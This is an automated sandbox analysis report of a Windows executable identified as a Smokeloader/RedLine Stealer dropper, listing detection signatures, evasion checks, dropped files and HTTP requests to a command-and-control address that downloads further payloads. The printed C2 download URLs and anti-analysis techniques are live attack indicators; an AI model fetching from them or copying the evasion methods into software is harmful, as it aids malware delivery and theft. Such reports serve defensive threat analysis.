Windows Analysis Report
zmTSHkabY6.exe

Overview

General Information

Sample name: zmTSHkabY6.exe
renamed because original name is a hash value
Original sample name: cab7af24073c5c1c62a2957dd5983c98.exe
Analysis ID: 1578897
MD5: cab7af24073c5c1c62a2957dd5983c98
SHA1: a41a42e84999503cf76b04edefe3c37f87023285
SHA256: 83709123b921be43ef4f8bcab88738b7e3f6b810fb443da8f447a287fa5d86ae
Tags: exeuser-abuse_ch
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • zmTSHkabY6.exe (PID: 2424 cmdline: "C:\Users\user\Desktop\zmTSHkabY6.exe" MD5: CAB7AF24073C5C1C62A2957DD5983C98)
    • WerFault.exe (PID: 4820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2424 -s 1496 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Yara matches (Source, Rule, Description, Author, Strings):

Source: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
Rule: Windows_Trojan_Smokeloader_3687686f
Description: unknown
Author: unknown
Strings:
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

Source: 00000000.00000002.3220928056.0000000000D99000.00000040.00000020.00020000.00000000.sdmp
Rule: Windows_Trojan_RedLineStealer_ed346e4c
Description: unknown
Author: unknown
Strings:
  • 0x1378:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: zmTSHkabY6.exe, Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1], ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exe, ReversingLabs: Detection: 75%
Source: zmTSHkabY6.exe, Virustotal: Detection: 56%
Source: zmTSHkabY6.exe, ReversingLabs: Detection: 42%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1], Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exe, Joe Sandbox ML: detected
Source: zmTSHkabY6.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\zmTSHkabY6.exe, Code function: 0_2_004034C0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004034C0
Source: C:\Users\user\Desktop\zmTSHkabY6.exe, Code function: 0_2_00E83727 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_00E83727
Source: zmTSHkabY6.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\zmTSHkabY6.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 15:23:56 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-stream
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 15:23:59 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-stream
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401880
Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: zmTSHkabY6.exe, 00000000.00000002.3223329343.00000000055F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/download
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/downloadVMj
Source: zmTSHkabY6.exe, 00000000.00000002.3223329343.00000000055F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/key
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2582270307.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2546745947.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2751522226.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2681187095.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2773900858.00000000056D9000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2716404410.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2526387694.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download
Source: zmTSHkabY6.exe, 00000000.00000003.2526387694.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download00
Source: zmTSHkabY6.exe, 00000000.00000003.2491315087.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download4
Source: zmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2644398463.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2617109524.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2751522226.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2681187095.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2716404410.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download://1H
Source: zmTSHkabY6.exe, 00000000.00000003.2491315087.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2429953901.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadJ
Source: zmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2644398463.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2617109524.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2751522226.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2681187095.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2716404410.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadZ
Source: zmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadb
Source: zmTSHkabY6.exe, 00000000.00000003.2546745947.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2526387694.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadt
Source: zmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2751522226.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2716404410.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadx
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2831266370.000000000569F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/download
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/download$MX
Source: zmTSHkabY6.exe, 00000000.00000003.2881735565.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/download://1H
Source: zmTSHkabY6.exe, 00000000.00000003.2881735565.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/downloadV
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/downloadtM
Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
Source: zmTSHkabY6.exe, 00000000.00000003.2881415496.000000000576A000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881415496.0000000005725000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2882255970.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881735565.000000000576B000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: zmTSHkabY6.exe, 00000000.00000003.2881415496.000000000576A000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881415496.0000000005725000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2882255970.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881735565.000000000576B000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
Source: zmTSHkabY6.exe, 00000000.00000003.2881415496.000000000576A000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881415496.0000000005725000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2882255970.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881735565.000000000576B000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

Source: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.3220928056.0000000000D99000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: zmTSHkabY6.exeStatic PE information: section name:
Source: zmTSHkabY6.exeStatic PE information: section name: .idata
Source: zmTSHkabY6.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\zmTSHkabY6.exeProcess Stats: CPU usage > 49%
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1] 614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Code function: String function: 00E89E07 appears 34 times
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Code function: String function: 10003160 appears 32 times
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Code function: String function: 00409BA0 appears 35 times
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2424 -s 1496
Source: dll[1].0.dr Static PE information: No import functions for PE file found
Source: Bunifu_UI_v1.5.3.dll.0.dr Static PE information: No import functions for PE file found
Source: dll[1].0.dr Static PE information: Data appended to the last section found
Source: Bunifu_UI_v1.5.3.dll.0.dr Static PE information: Data appended to the last section found
Source: zmTSHkabY6.exe, 00000000.00000003.2883799341.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs zmTSHkabY6.exe
Source: zmTSHkabY6.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.3220928056.0000000000D99000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Y-Cleaner.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: zmTSHkabY6.exe Static PE information: Section: mimgnztd ZLIB complexity 0.9899864498025739
Source: classification engine Classification label: mal100.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Code function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 0_2_00402950
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Code function: 0_2_00D9A3A6 CreateToolhelp32Snapshot,Module32First, 0_2_00D9A3A6
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Code function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar, 0_2_00401880
Source: C:\Users\user\Desktop\zmTSHkabY6.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2424
Source: C:\Users\user\Desktop\zmTSHkabY6.exe File created: C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Command line argument: emp 0_2_00408020
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Command line argument: mixtwo 0_2_00408020
Source: C:\Users\user\Desktop\zmTSHkabY6.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: zmTSHkabY6.exe Virustotal: Detection: 56%
Source: zmTSHkabY6.exe ReversingLabs: Detection: 42%
Source: zmTSHkabY6.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\zmTSHkabY6.exe "C:\Users\user\Desktop\zmTSHkabY6.exe"
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2424 -s 1496
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Cleaner.lnk.0.dr LNK file: ..\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exe
Source: zmTSHkabY6.exe Static file information: File size 1945088 > 1048576
Source: C:\Users\user\Desktop\zmTSHkabY6.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: zmTSHkabY6.exe Static PE information: Raw size of mimgnztd is bigger than: 0x100000 < 0x1ab600

Data Obfuscation

Source: C:\Users\user\Desktop\zmTSHkabY6.exe Unpacked PE file: 0.2.zmTSHkabY6.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mimgnztd:EW;korrylev:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.0.dr Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: zmTSHkabY6.exe Static PE information: real checksum: 0x1dc3d5 should be: 0x1e6ae6
Source: dll[1].0.dr Static PE information: real checksum: 0x0 should be: 0x35f67
Source: Bunifu_UI_v1.5.3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x35f67
Source: soft[1].0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: zmTSHkabY6.exe Static PE information: section name:
Source: zmTSHkabY6.exe Static PE information: section name: .idata
Source: zmTSHkabY6.exe Static PE information: section name:
Source: zmTSHkabY6.exe Static PE information: section name: mimgnztd
Source: zmTSHkabY6.exe Static PE information: section name: korrylev
Source: zmTSHkabY6.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Code function: 0_2_0041FAB5 push esi; ret 0_2_0041FABE
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Code function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: zmTSHkabY6.exe Static PE information: section name: mimgnztd entropy: 7.947730998913052
Source: Y-Cleaner.exe.0.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\zmTSHkabY6.exe File created: C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exe
Source: C:\Users\user\Desktop\zmTSHkabY6.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1]
Source: C:\Users\user\Desktop\zmTSHkabY6.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]
Source: C:\Users\user\Desktop\zmTSHkabY6.exe File created: C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Bunifu_UI_v1.5.3.dll

Boot Survival

Source: C:\Users\user\Desktop\zmTSHkabY6.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\zmTSHkabY6.exe Window searched: window name: Filemonclass
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\zmTSHkabY6.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\zmTSHkabY6.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B9878 second address: 9B987C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B987C second address: 9B9882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B9882 second address: 9B9896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F9899183FE6h 0x0000000a jmp 00007F9899183FEAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 986B7E second address: 986B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 986B84 second address: 986B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 986B8A second address: 986BC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2762h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jmp 00007F98991A2769h 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B7D3A second address: 9B7D5D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jmp 00007F9899183FF2h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jp 00007F9899183FECh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
